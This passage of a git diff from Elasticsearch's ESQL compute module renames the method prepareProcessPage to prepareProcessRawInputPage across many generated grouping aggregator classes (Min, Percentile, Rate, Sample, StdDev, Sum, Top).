-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BooleanBlock valuesBlock = page.getBlock(channels.get(0));
     BooleanVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBytesRefGroupingAggregatorFunction.java
index dc721573876ab..92f79d5491ca6 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBytesRefGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBytesRefGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BytesRefBlock valuesBlock = page.getBlock(channels.get(0));
     BytesRefVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinDoubleGroupingAggregatorFunction.java
index 3212ca644aee7..d810b06eb310e 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinDoubleGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinFloatGroupingAggregatorFunction.java
index 2e7b089e7592a..a7a5e0141fcc8 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinFloatGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIntGroupingAggregatorFunction.java
index 50c5e80a55b0c..3148f36936404 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIntGroupingAggregatorFunction.java
@@ -57,7 +57,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIpGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIpGroupingAggregatorFunction.java
index c89c1feb6790f..1dcb89c4fca55 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIpGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIpGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BytesRefBlock valuesBlock = page.getBlock(channels.get(0));
     BytesRefVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinLongGroupingAggregatorFunction.java
index dc92d712ddb6a..a16cd68432e8d 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinLongGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileDoubleGroupingAggregatorFunction.java
index 1264bff20abf6..6ad6afb6bf8a8 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileDoubleGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileFloatGroupingAggregatorFunction.java
index f844efae8d218..0af4b60c73a64 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileFloatGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileIntGroupingAggregatorFunction.java
index e0dd21ecc80d1..f9a754cc6a7b8 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileIntGroupingAggregatorFunction.java
@@ -60,7 +60,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileLongGroupingAggregatorFunction.java
index 1baa4a662175c..b71c068bc72b8 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileLongGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateDoubleGroupingAggregatorFunction.java
index 25923bf02a761..654b92f53441f 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateDoubleGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateFloatGroupingAggregatorFunction.java
index 7dbe1a2de02bd..a9a577e63a289 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateFloatGroupingAggregatorFunction.java
@@ -63,7 +63,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateIntGroupingAggregatorFunction.java
index 4650ebf0c5bb2..e6c813635a4f8 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateIntGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateLongGroupingAggregatorFunction.java
index a219a58068ea0..7c2a2f61ca79b 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateLongGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBooleanGroupingAggregatorFunction.java
index cec8ea8b6c21a..aac76b70397c7 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBooleanGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBooleanGroupingAggregatorFunction.java
@@ -60,7 +60,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BooleanBlock valuesBlock = page.getBlock(channels.get(0));
     BooleanVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBytesRefGroupingAggregatorFunction.java
index 60e38edd06d1f..f9b439507a09e 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBytesRefGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBytesRefGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BytesRefBlock valuesBlock = page.getBlock(channels.get(0));
     BytesRefVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleDoubleGroupingAggregatorFunction.java
index cd76527394432..a901a4ed385a0 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleDoubleGroupingAggregatorFunction.java
@@ -60,7 +60,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleIntGroupingAggregatorFunction.java
index b2cf3114fa951..68f7a7d83b414 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleIntGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleLongGroupingAggregatorFunction.java
index afb1e94a23f5a..9003fa0f18e1a 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleLongGroupingAggregatorFunction.java
@@ -60,7 +60,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevDoubleGroupingAggregatorFunction.java
index 7cf0ab3e7b148..fc8a09f0400df 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevDoubleGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevFloatGroupingAggregatorFunction.java
index e3bbbb5d4d624..f1cb0acbd13ee 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevFloatGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevIntGroupingAggregatorFunction.java
index b0c780b232fe7..96f50bc1dc4a7 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevIntGroupingAggregatorFunction.java
@@ -60,7 +60,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevLongGroupingAggregatorFunction.java
index 7e33a0c70c145..4a9e201d9a24c 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevLongGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumDoubleGroupingAggregatorFunction.java
index 303bb3d0ff5dc..20ad84b38062a 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumDoubleGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumFloatGroupingAggregatorFunction.java
index 154057db5f462..84839289c5dad 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumFloatGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumIntGroupingAggregatorFunction.java
index 9b5cba8cd5a89..a4da0af4aaf2e 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumIntGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumLongGroupingAggregatorFunction.java
index a2969a4dddaa8..84c81abad299b 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumLongGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBooleanGroupingAggregatorFunction.java
index 1fa211364cfcc..1746fae25bd7f 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBooleanGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBooleanGroupingAggregatorFunction.java
@@ -62,7 +62,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BooleanBlock valuesBlock = page.getBlock(channels.get(0));
     BooleanVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBytesRefGroupingAggregatorFunction.java
index 4ab5bb9875107..a2161368a78ef 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBytesRefGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBytesRefGroupingAggregatorFunction.java
@@ -63,7 +63,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BytesRefBlock valuesBlock = page.getBlock(channels.get(0));
     BytesRefVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopDoubleGroupingAggregatorFunction.java
index 8a2f4aef9cf35..9f77b1eef8f17 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopDoubleGroupingAggregatorFunction.java
@@ -62,7 +62,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopFloatGroupingAggregatorFunction.java
index d09bf60c82aca..8897d5d29a6ac 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopFloatGroupingAggregatorFunction.java
@@ -62,7 +62,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIntGroupingAggregatorFunction.java
